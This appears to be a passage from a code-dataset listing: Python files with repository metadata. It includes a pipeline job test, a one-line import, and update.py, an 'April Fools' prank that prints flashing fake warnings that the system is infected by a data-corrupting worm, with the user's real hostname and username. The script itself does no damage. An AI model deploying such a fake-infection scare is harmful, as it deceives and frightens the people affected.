job3 = models.Job.create(pipeline_id=pipeline.id, status='waiting')
models.StartCondition.create(
job_id=job2.id,
preceding_job_id=job1.id,
condition='fail')
models.StartCondition.create(
job_id=job3.id,
preceding_job_id=job2.id,
condition='success')
result = job2.start()
self.assertFalse(result)
self.assertEqual(job2.status, 'failed')
self.assertEqual(job3.status, 'failed')
| 37.44316
| 79
| 0.715484
| 2,420
| 19,433
| 5.578926
| 0.080165
| 0.085179
| 0.069995
| 0.101326
| 0.852974
| 0.806237
| 0.751574
| 0.710836
| 0.690616
| 0.659951
| 0
| 0.012453
| 0.157052
| 19,433
| 518
| 80
| 37.515444
| 0.811733
| 0.036073
| 0
| 0.712644
| 0
| 0
| 0.059528
| 0.002244
| 0
| 0
| 0
| 0
| 0.232184
| 1
| 0.110345
| false
| 0
| 0.016092
| 0
| 0.144828
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
ccc34ecae49eb2a4843e07a512a9a86fbb56d033
| 49
|
py
|
Python
|
trainer.py
|
OuedraogoAbdoul/student-evaluation-courses
|
aea571385ccc7b5580f38b730d46060e9c9ee343
|
[
"MIT"
] | null | null | null |
trainer.py
|
OuedraogoAbdoul/student-evaluation-courses
|
aea571385ccc7b5580f38b730d46060e9c9ee343
|
[
"MIT"
] | null | null | null |
trainer.py
|
OuedraogoAbdoul/student-evaluation-courses
|
aea571385ccc7b5580f38b730d46060e9c9ee343
|
[
"MIT"
] | null | null | null |
from processing.preprocessor import Preprocessor
| 24.5
| 48
| 0.897959
| 5
| 49
| 8.8
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081633
| 49
| 1
| 49
| 49
| 0.977778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
ccd00e5b53c025ca69b8f0e77113514f41315839
| 1,662
|
py
|
Python
|
update.py
|
JJFReibel/AprilFoolsScript
|
2c68c04b5c56e4961a2404d1eb3d77a79154d836
|
[
"MIT"
] | null | null | null |
update.py
|
JJFReibel/AprilFoolsScript
|
2c68c04b5c56e4961a2404d1eb3d77a79154d836
|
[
"MIT"
] | null | null | null |
update.py
|
JJFReibel/AprilFoolsScript
|
2c68c04b5c56e4961a2404d1eb3d77a79154d836
|
[
"MIT"
] | null | null | null |
# April Fools Script
# By Jean-Jacques F. Reibel
# I will not be held responsible for:
# any shenanigans
import os
import platform
import getpass
os.system("printf '\n\e[1;31;5;5m WARNING! WARNING! WARNING! WARNING! WARNING! WARNING! WARNING!\n'")
os.system("printf '\e[0;33;1;1m YOUR SYSTEM IS INFECTED.\n'")
os.system("printf '\e[0;36;1;1m PYTHON WORM IS DOWNLOADING AND CORRUPTING ALL DATA \n'")
os.system("printf '\e[0;35;1;1m FOLLOWED BY FULL SYSTEM SHUTDOWN.\n\n'")
os.system("printf '\e[0;31;1;1m'")
print("Computer Name:"+ " "*19 + str(platform.node()))
print(str("Operating System:" + " "*16 + platform.system()))
print(str("Operating System Release:" + " "*8 + platform.release()))
print(str("Operating System Version:" + " "*8 + platform.platform()))
print(str("User Name:" + " "*23) + getpass.getuser())
os.system("printf '\e[1;32;1;1m\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~('")
os.system("printf '\e[0;33;1;1m°'")
os.system("printf '\e[0;31;1;1m<'")
os.system("printf '\e[0;31;1;5m~\n'")
os.system("printf '\e[0;37;1;5m\n ¯'")
os.system("printf '\e[0;31;1;5m\_'")
os.system("printf '\e[0;33;1;5m('")
os.system("printf '\e[0;34;1;5mツ'")
os.system("printf '\e[0;33;1;5m)'")
os.system("printf '\e[0;31;1;5m_/'")
os.system("printf '\e[0;37;1;5m¯\n'")
os.system("printf '\e[0;33;1;5m\n'")
os.system("printf '\e[0;34;1;1m WE OWN YOU. \n\n'")
os.system("printf '\e[0;31;1;5m ~'")
os.system("printf '\e[0;31;1;1m>'")
os.system("printf '\e[0;33;1;1m°'")
os.system("printf '\e[1;32;1;1m)~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n'")
os.system("printf '\e[1;31;5;5m WARNING! WARNING! WARNING! WARNING! WARNING! WARNING! WARNING!\n\n'")
| 44.918919
| 101
| 0.608303
| 299
| 1,662
| 3.38796
| 0.237458
| 0.181639
| 0.317868
| 0.325765
| 0.561698
| 0.561698
| 0.513327
| 0.507404
| 0.435341
| 0.363277
| 0
| 0.08339
| 0.112515
| 1,662
| 36
| 102
| 46.166667
| 0.600678
| 0.057762
| 0
| 0.064516
| 0
| 0.129032
| 0.627803
| 0.060218
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.064516
| 0.096774
| 0
| 0.096774
| 0.903226
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 1
|
0
| 6
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.